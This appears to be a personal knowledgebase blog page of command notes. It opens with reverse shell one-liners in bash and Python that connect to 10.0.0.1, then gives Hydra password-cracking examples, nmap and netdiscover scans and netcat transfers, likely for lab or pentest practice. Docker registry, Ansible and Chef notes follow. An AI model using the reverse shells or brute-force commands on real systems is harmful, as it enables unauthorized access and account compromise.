Tikejhya: Ashish Nepal

Knowledgebase

reverse shell

Your ads will be inserted here by

Easy Plugin for AdSense.

Please go to the plugin admin page to
Paste your ad code OR
Suppress this ad slot.

Bash

Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10):

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

Python

This was tested under Linux / Python 2.7:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Ref: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
You have already voted.

steganography & exiftool

Your ads will be inserted here by

Easy Plugin for AdSense.

Please go to the plugin admin page to
Paste your ad code OR
Suppress this ad slot.

Using steganography, secret messages can be embedded into images.

using exiftool to discover a base64 encoded message on the image metadata

apt install libimage-exiftool-perl
exiftool /tmp/for-007.jpg

You have already voted.

hydra [by example]

Your ads will be inserted here by

Easy Plugin for AdSense.

Please go to the plugin admin page to
Paste your ad code OR
Suppress this ad slot.

hydra -L Boris -P /usr/share/wordlists/fasttrack.txt -t20 172.28.128.3 -s55007 -I pop3

Hydra is a parallelized login cracker which supports numerous protocols to attack.

 

Examples:
hydra -l user -P passlist.txt ftp://192.168.0.1
hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
hydra -l admin -p password ftp://[192.168.0.0/24]/
hydra -L logins.txt -P pws.txt -M targets.txt ssh
hydra 172.28.128.5 http-post-form “/path/index.php:key=^PASS^:invalid key” -l username -P /usr/share/dict/words -t 10 -w 30 -o hydra-http-post-attack.txt

quick tip: you may want to send two keys:; user=^USER^&pass=^PASS^:Bad login”
Host =172.28.128.5
Method = http-form-post
URL =/path/index.php
Form parameters =key=^PASS^
Failure response =invalid key
Users file = users.txt
Password file =/usr/share/dict/words
Threads = -t 10
Wait for timeout = -w 30
Output file = -o hydra-http-post-attack.txt

You have already voted.

nmap

nmap -p- -Pn -n 172.28.128.3

-p-: you can specify -p- to scan ports from 1 through 65535.

-Pn: Treat all hosts as online — skip host discovery

-n/-R: Never do DNS resolution/Always resolve [default: sometimes]

 

nmap -sV -T4 -p-65535 172.28.128.3

Adding the -sV option enables Nmap version detection, which is trained to look for these clues (among others).

-T4 prohibits the dynamic scan delay from exceeding 10 ms for TCP ports and -T5 caps that value at 5 ms.

-p-65535: scan all ports to 65535

Reference to values for T: T Table

You have already voted.

netdiscover

Netdiscover is a simple ARP scanner which can be used to scan for live hosts in a network.

Discover your network interface eth0 for range of 172.28.128.0/24::
netdiscover -i eth0 -r 172.28.128.0/24-i device: your network device

 

Options available:

  -r range: scan a given range instead of auto scan. 172.28.128.0/24,/16,/8
  -l file: scan the list of ranges contained into the given file
  -p passive mode: do not send anything, only sniff
  -m file: scan the list of known MACs and host names
  -F filter: Customize pcap filter expression (default: "arp")
  -s time: time to sleep between each arp request (miliseconds)
  -n node: last ip octet used for scanning (from 2 to 253)
  -c count: number of times to send each arp reques (for nets with packet loss)
  -f enable fastmode scan, saves a lot of time, recommended for auto
  -d ignore home config files for autoscan and fast mode
  -S enable sleep time supression betwen each request (hardcore mode)
  -P print results in a format suitable for parsing by another program
  -N Do not print header. Only valid when -P is enabled.
  -L in parsable output mode (-P), continue listening after the active scan is completed

You have already voted.

Netcat

Netcat test open port

nc -zv 192.168.1.15 22

In the command above, the flag:

  1. -z – sets nc to simply scan for listening daemons, without actually sending any data to them.
  2. -v – enables verbose mode.

Passing -u you can test udp port.

Using Netcat for File Transfers

Receiver

nc -l -p 3334 > file

will begin listening on port 3334.

Sender

nc -w 3 [IP_of_destination] 3334 < file

Compression can be used too

Reciver

nc -l -p 3334 | uncompress -c | tar xvfp -

Sender

tar cfp - /some/dir | compress -c | nc -w 3 [IP_of_destination] 3334
You have already voted.

private docker registry

Private docker registry using letsencrypt and Authentication.

#Creating letsencrypt:

./letsencrypt-auto certonly -a manual --rsa-key-size 4096 -d www.tikejhya.com -d registry.tikejhya.com --debug

#Creating auth file

docker run --entrypoint htpasswd registry:2 -Bbn testuser testpassword > auth/htpasswd

 

#If required:

docker stop registry && docker rm -v registry

#Create registry
docker run -d -p 443:5000 --restart=always --name registry \
-v `pwd`/auth:/auth \
-e "REGISTRY_AUTH=htpasswd" \
-e "REGISTRY_AUTH_HTPASSWD_REALM=Registry Realm" \
-e REGISTRY_AUTH_HTPASSWD_PATH=/auth/htpasswd \
-v `pwd`/certs:/certs \
-e REGISTRY_HTTP_TLS_CERTIFICATE=/certs/mydomain_public.crt \
-e REGISTRY_HTTP_TLS_KEY=/certs/mydomain_private.key \
registry:2

#Test login
docker login registry.tikejhya.com

#Pull some image
docker pull php:php-fpm
#Tag image into newly created registry

docker tag registry.tikejhya.com/my-php

#push image to repo

docker push registry.tikejhya.com/my-php

#Lets pull from remote server:

docker login registry.tikejhya.com
docker --config ~/.docker pull registry.tikejhya.com/php-fpm

docker pull registry.tikejhya.com/bmi-php

dynamic inventory ec2.py with multiple inventory

While running  multiple inventory with ec2.py; You will also need to copy the ec2.ini file to location where you have ec2.py.

My structure was with 4 different environment and i didnt want to copy ec2.py all over the inventory rather use 1 and create ec2.ini according to requirement per environment. (which may be what many would like to do).

root@tikejhya:/etc/ansible# tree
.
├── development
│ └── ec2.ini
├── ec2.py
├── ext.py
├── ext.pyc
├── prod
│ └── ec2.ini
├── roles
├── staging
│ └── ec2.ini
└── uat
├── base
└── ec2.ini

Since there was not really out of the box solution; i created ext.py below and import into ec2.py.

#ec2.py

135 from ansible.module_utils import ec2 as ec2_utils
++ 136 from ext import mapper
137
138 HAS_BOTO3 = False

And:

487 help='Use boto profile for connections to EC2')
++ 488 parser.add_argument('--my_env', action='store', dest='my_env',
help='Use env for veriable')
490 self.args = parser.parse_args()
491
++ 492 mapper(self.args.my_env)

#ext.py
#!/usr/bin/python
import os
import sys

def mapper(self_args_my_env):
os.environ[“EC2_INI_PATH”] = “/etc/ansible/” + self_args_my_env + “/ec2.ini”
os.environ[“AWS_PROFILE”] = “profile_” + self_args_my_env

This made me able to run ansible with ec2.py followed by env parameter and use relevent boto profile.

ec2.py –my_env uat –list

chef [rendering template]

filebeat:
prospectors:

<% @rolename.each do |role| %>
#Some prospector should be passed in here based on role
<%= render "filebeat-syslog.yaml.erb" -%>

<%= render "filebeat-#{role}.yaml.erb" -%>
<% end %>
registry_file: <%= @path_registry %>

output:

logstash:
hosts: [“<%= node.filebeats.logstashhost %>:<%= node.filebeats.logstashport %>“]
#tls:
#certificate_authorities: [“/etc/pki/tls/certs/beats.crt”]
#insecure: true

shipper:

logging:

files:
rotateeverybytes: 10485760 # = 10MB

#In above rendering, variables comes from recipe which is loaded attributes.

$ cat attributes/default.rb
default[‘filebeat’][‘apache_log_file’] = [‘/var/log/httpd/*error_log’, ‘/var/log/httpd/*access_log’]

$ cat recipes/config.rb
rolename = node.roles

template ‘/etc/filebeat/filebeat.yml’ do
source ‘filebeat-default.yaml.erb’
mode ‘0440’
owner ‘root’
group ‘root’
variables(
path_apache_log_file: node[‘filebeat’][‘apache_log_file’],
input_type: node[‘filebeat’][‘input_type’],
document_type: node[‘filebeat’][‘document_type’],
path_registry: node[‘filebeat’][‘registry’],
:rolename => rolename,

)
end

$ cat templates/default/filebeat-default.yaml.erb
filebeat:
prospectors:

<% @rolename.each do |role| %>
#Some prospector should be passed in here based on role
<%= render "filebeat-syslog.yaml.erb" -%>

<%= render "filebeat-#{role}.yaml.erb" -%>
<% end %>
registry_file: <%= @path_registry %>

output:

logstash:
hosts: [“<%= node.filebeats.logstashhost %>:<%= node.filebeats.logstashport %>“]
#tls:
#certificate_authorities: [“/etc/pki/tls/certs/beats.crt”]
#insecure: true

shipper:

logging:

files:
rotateeverybytes: 10485760 # = 10MB
[ashnep@mgmt1-prod1 filebeats]$ cat templates/default/filebeat-magento.yaml.erb
<% @path_apache_log_file.each do |j| %>

paths:
– <%= j %>
input_type: <%= @input_type %>
<% if j =~ /error_log/ %>
document_type: apache-error-log
<% else %>
document_type: apache-access-log
<% end %>
fields:
service:
zone: <%= @zone %>

<% end %>

chef [templates]

template “/data/project/config.inc” do
source ‘config.inc.erb’
variables(
smtp_host: node[‘smtp’][‘host’],
smtp_port: node[‘smtp’][‘port’],
suffix: suffix,
)
owner ‘apache’
group ‘apache’
mode ‘0744’
end

Page 1 of 41

Powered by WordPress & Theme by Anders Norén